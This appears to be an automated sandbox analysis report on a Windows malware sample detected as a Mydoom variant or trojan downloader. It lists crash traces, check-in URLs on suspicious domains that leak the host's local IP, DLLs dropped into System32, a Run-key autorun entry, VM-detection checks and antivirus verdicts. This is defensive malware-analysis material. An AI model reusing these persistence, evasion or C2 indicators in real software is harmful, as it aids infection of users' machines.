exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 94042304
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 94042344
registers.edx: 2047
registers.ebx: 8854872
registers.esi: 8344784
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 96663744
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 96663784
registers.edx: 2047
registers.ebx: 8850040
registers.esi: 8340064
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45

exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00
exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0
exception.instruction: xor cl, byte ptr [esi + 2]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209584
exception.address: 0x77e532b0
registers.esp: 91551936
registers.edi: 6684672
registers.eax: 1048576
registers.ebp: 91551976
registers.edx: 2047
registers.ebx: 8855768
registers.esi: 8345600
registers.ecx: 0
1 0 0
Performs some HTTP requests (2 events)
request GET http://ehqnarrrrh.ws/imgs/krewa/nqxa.php?id=d89zkcxo&s5=3159&lip=192.168.168.228&win=fWinS
request GET http://rawphhnwss.org/imgs/krewa/nqxa.php?id=d89zkcxo&s5=3159&lip=192.168.168.228&win=fWinS
Creates executable files on the filesystem (6 events)
file C:\Windows\System32\zipfi.dll
file C:\Windows\System32\shervans.dll
file C:\Windows\System32\satornas.dll
file C:\Windows\System32\ctfmen.exe
file C:\Windows\System32\grcopy.dll
file C:\Windows\System32\zipfiaq.dll
Creates hidden or system file (1 event)
Time & API Arguments Status Return Repeated

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Windows\system32\satornas.dll
filepath: C:\Windows\System32\satornas.dll
1 1 0
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
section {u'size_of_data': u'0x00005600', u'virtual_address': u'0x0000e000', u'entropy': 7.662503336196652, u'name': u'4008cvbx', u'virtual_size': u'0x0000556c'} entropy 7.6625033362 description A section with a high entropy has been found
entropy 0.288590604027 description Overall entropy of this PE file is high
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Raised Snort alerts (1 event)
snort ET INFO Observed DNS Query to .biz TLD
Raised Suricata alerts (3 events)
suricata ETPRO MALWARE Worm.Mydoom Checkin
suricata ETPRO MALWARE User-Agent (explwer)
suricata ET INFO Observed DNS Query to .biz TLD
Detects virtualization software with SCSI Disk Identifier trick(s) (2 events)
registry HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0
registry HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\1
Installs itself for autorun at Windows startup (2 events)
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen reg_value C:\Windows\system32\ctfmen.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen reg_value C:\Windows\system32\ctfmen.exe
File has been identified by 16 AntiVirus engine on IRMA as malicious (16 events)
G Data Antivirus (Windows) Virus: Dropped:Generic.Mydoom.5713DF4B (Engine A)
Avast Core Security (Linux) Win32:Mydoom-BJ [Wrm]
C4S ClamAV (Linux) Win.Malware.Generickdz-9918324-0
F-Secure Antivirus (Linux) Trojan.TR/Downloader.Gen [Aquarius]
Windows Defender (Windows) Trojan:Win32/MyDoom!pz
Microsoft Defender ATP (Linux) Trojan:Win32/MyDoom!pz
Forticlient (Linux) W32/Agent.NHB!worm
Sophos Anti-Virus (Linux) Mal/Behav-104
eScan Antivirus (Linux) Dropped:Generic.Mydoom.5713DF4B(DB)
ESET Security (Windows) a variant of Win32/Agent.NHB worm
McAfee CLI scanner (Linux) Trojan-FRMT
DrWeb Antivirus (Linux) Trojan.DownLoader8.56532
ClamAV (Linux) Win.Malware.Generickdz-9918324-0
Bitdefender Antivirus (Linux) Dropped:Generic.Mydoom.5713DF4B
Kaspersky Standard (Windows) Trojan.Win32.Small.acli
Emsisoft Commandline Scanner (Windows) Dropped:Generic.Mydoom.5713DF4B (B)
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 events)
Bkav W32.AIDetectMalware
Cynet Malicious (score: 100)
CAT-QuickHeal Trojan.Occamy.S5071046
Skyhigh BehavesLike.Win32.Mytob.lh
ALYac Dropped:Generic.Mydoom.5713DF4B
Cylance Unsafe
VIPRE Dropped:Generic.Mydoom.5713DF4B
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Dropped:Generic.Mydoom.5713DF4B
K7GW Trojan ( 004d7c651 )
K7AntiVirus Trojan ( 004d7c651 )
Arcabit Generic.Mydoom.5713DF4B
VirIT Trojan.Win32.Dnldr8.DFQI
Symantec W32.Mydoom.B@mm
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Agent.NHB
APEX Malicious
Avast Win32:Mydoom-BJ [Wrm]
ClamAV Win.Malware.Generickdz-9918324-0
Kaspersky Trojan.Win32.Small.acli
Alibaba Malware:Win32/km_2edd8.None
NANO-Antivirus Trojan.Win32.Mudrop.ijmve
MicroWorld-eScan Dropped:Generic.Mydoom.5713DF4B
Rising Worm.Mydoom!1.100A4 (CLASSIC)
Emsisoft Dropped:Generic.Mydoom.5713DF4B (B)
F-Secure Trojan.TR/Downloader.Gen
DrWeb Trojan.DownLoader8.56532
Zillya Trojan.Small.Win32.44096
McAfeeD Real Protect-LS!D57CC2304C40
Trapmine malicious.high.ml.score
CTX exe.unknown.dropped
Sophos Mal/Behav-104
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.d57cc2304c405554
Jiangmin TrojanDropper.Mudrop.cbn
Webroot W32.Malware.gen
Google Detected
Avira TR/Downloader.Gen
Antiy-AVL Trojan/Win32.Small
Kingsoft malware.kb.a.1000
Gridinsoft Trojan.Win32.Agent.bot!s1
Xcitium TrojWare.Win32.Small.AD@83l0z7
Microsoft Trojan:Win32/MyDoom!pz
GData Win32.Trojan.PSE.1BC1FFR
Varist W32/Mydoom.G.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.R643764
Acronis suspicious
McAfee Trojan-FRMT!D57CC2304C40
DeepInstinct MALICIOUS
Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action VT Location
No hosts contacted.